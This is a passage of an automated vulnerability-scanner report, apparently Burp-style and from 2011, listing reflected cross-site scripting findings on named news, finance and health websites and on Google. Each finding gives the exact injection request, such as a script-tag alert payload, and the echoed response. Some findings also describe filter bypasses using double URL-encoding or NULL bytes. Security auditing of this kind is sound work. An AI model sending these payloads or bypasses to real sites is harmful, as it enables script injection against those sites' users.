The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f2e5"><script>alert(1)</script>6009f09c189 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?icid=navbar_citysbest_main5&9f2e5"><script>alert(1)</script>6009f09c189=1 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:05 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:05 GMT; path=/
Content-Type: text/html
Content-Length: 15691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/?icid=navbar_citysbest_main5&9f2e5"><script>alert(1)</script>6009f09c189=1"/>
...[SNIP]...

2.5. http://www.citysbest.com/traffic/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/traffic/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3384%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ccc1ec0bf6 was submitted in the REST URL parameter 1. This input was echoed as f3384</script><script>alert(1)</script>0ccc1ec0bf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /trafficf3384%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ccc1ec0bf6/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:57 GMT; path=/
Content-Type: text/html
Content-Length: 17861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "trafficf3384</script><script>alert(1)</script>0ccc1ec0bf6" : "national";

var isUrl2 = "";
s_265.prop2= isUrl2 != ''? "" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.purchaseID=Math.ceil(Math.random()
...[SNIP]...

2.6. http://www.citysbest.com/traffic/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/traffic/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0958"><script>alert(1)</script>e2e8451909c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trafficd0958"><script>alert(1)</script>e2e8451909c/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:35 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 01:59:36 GMT; path=/
Content-Type: text/html
Content-Length: 17532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/trafficd0958"><script>alert(1)</script>e2e8451909c/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=76544643"/>
...[SNIP]...

2.7. http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.dailyfinance.com
Path:	/markets/mostactives

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7010'%3b71e04f33930 was submitted in the REST URL parameter 2. This input was echoed as b7010';71e04f33930 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /markets/mostactivesb7010'%3b71e04f33930 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243_64_12_173_49=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; AOL_StockQuotesLiveUpdate=1; s_pers=%20s_getnr%3D1304575093082-New%7C1367647093082%3B%20s_nrgvo%3DNew%7C1367647093084%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.95b2;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:34 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:34 GMT; Path=/
Set-Cookie: IPHONE_MESSAGE=2; Expires=Wed, 03-Aug-2011 10:56:34 GMT; Path=/
Content-Language: en
Content-Length: 68717
Keep-Alive: timeout=5, max=999
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Market Movers:</titl
...[SNIP]...

...[SNIP]...

2.8. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.everydayhealth.com
Path:	/allergy/climate-change-and-allergies.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc36d'%3bf5e1aa920da was submitted in the REST URL parameter 2. This input was echoed as fc36d';f5e1aa920da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /allergy/climate-change-and-allergies.aspxfc36d'%3bf5e1aa920da HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPBurMtkMjIxMTI2NS01ODVmLTQwMjYtOTNhZi1lZDQyOGE5ZWU2Y2E1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dbvjd455jngipsngirkccraw; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/allergy/climate-change-and-allergies.aspxfc36d';f5e1aa920da', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.9. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/allergy/climate-change-and-allergies.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c6e76"><script>alert(1)</script>76c82397b8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6e76"><script>alert(1)</script>76c82397b8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /allergy/climate-change-and-allergies.aspx?%00c6e76"><script>alert(1)</script>76c82397b8f=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO*ri-NiNTMxMWZkZS04NTY4LTRiYjEtODAwOC0xN2Q0NzQ1YTM0NGQ1; expires=Wed, 13-Jul-2011 21:36:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=c5cfbq55mbxvfz55feiauhef; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49343

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx?%00c6e76"><script>alert(1)</script>76c82397b8f=1" />
...[SNIP]...

2.10. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.everydayhealth.com
Path:	/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac7e'%3b98481e38035 was submitted in the REST URL parameter 3. This input was echoed as 8ac7e';98481e38035 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx8ac7e'%3b98481e38035 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPFHohNiNzhlZWI5Mi02YzQyLTQyMWMtOWExZS1iZWJlZjRmYjg5ZTU1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hxo2de55iuwcrdvelxqosn55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx8ac7e';98481e38035', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.11. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004b806"><script>alert(1)</script>8759e8fbd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4b806"><script>alert(1)</script>8759e8fbd80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?%004b806"><script>alert(1)</script>8759e8fbd80=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPB*XTNmOWRkZmU1ZS0xODQ2LTQ1ZTAtYWNlYS0xY2FjNmI1YzNlZDI1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=k0j5vvz5mxglzzntqc5yh03h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49861

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?%004b806"><script>alert(1)</script>8759e8fbd80=1" />
...[SNIP]...

2.12. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.everydayhealth.com
Path:	/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9361'%3b84c782d8b16 was submitted in the REST URL parameter 3. This input was echoed as a9361';84c782d8b16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspxa9361'%3b84c782d8b16 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPEoo5s1MDkxMWEzZi0yMDZiLTRjYTAtYWNmNS0wZTY1YTU3ODg5ZjQ1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xn1xydrmhljdevihanbstg45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspxa9361';84c782d8b16', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.13. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a9efd"><script>alert(1)</script>8b47a959d8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9efd"><script>alert(1)</script>8b47a959d8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?%00a9efd"><script>alert(1)</script>8b47a959d8d=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPBnhcM4ODI1YTExNS0xOGU4LTQwMDktOTliYi0wZGFlYzYyZDY0MGU1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zln3ns55gb5bpcmolex34fm4; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49142

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?%00a9efd"><script>alert(1)</script>8b47a959d8d=1" />
...[SNIP]...

2.14. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.everydayhealth.com
Path:	/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f526d'%3bb39bf44577d was submitted in the REST URL parameter 3. This input was echoed as f526d';b39bf44577d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspxf526d'%3bb39bf44577d HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPID-ztmODA3YjBjZC03ZWNhLTRlNTQtODI4OS1lYTk2OWZjNDIxNzI1; expires=Wed, 13-Jul-2011 21:36:37 GMT; path=/
Set-Cookie: ASP.NET_SessionId=w3vie3btzynw5f451gmktxfe; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspxf526d';b39bf44577d', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

2.15. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d45e7"><script>alert(1)</script>ec06d481550 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d45e7"><script>alert(1)</script>ec06d481550 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?%00d45e7"><script>alert(1)</script>ec06d481550=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPE-GLMyMDBhOGIyYi0wNTRiLTQ3ZmYtYTVhZC00MDg4M2QxNGVlMTM1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jud0jt45dvf1vafmolehev55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47550

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?%00d45e7"><script>alert(1)</script>ec06d481550=1" />
...[SNIP]...

2.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.google.com
Path:	/advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 77493(a)5729f6350b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /advanced_search?77493(a)5729f6350b6=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1303613395.1.1.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/apptesting.aspx; __utma=173272373.620417115.1303613395.1303613395.1303613395.1; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:57:38 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?77493(a)5729f6350b6\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

2.17. http://www.huffingtonpost.com/ [icid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/

Issue detail

The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8739e"-alert(1)-"26ca8215966 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?icid=navbar_huffpo_main58739e"-alert(1)-"26ca8215966 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
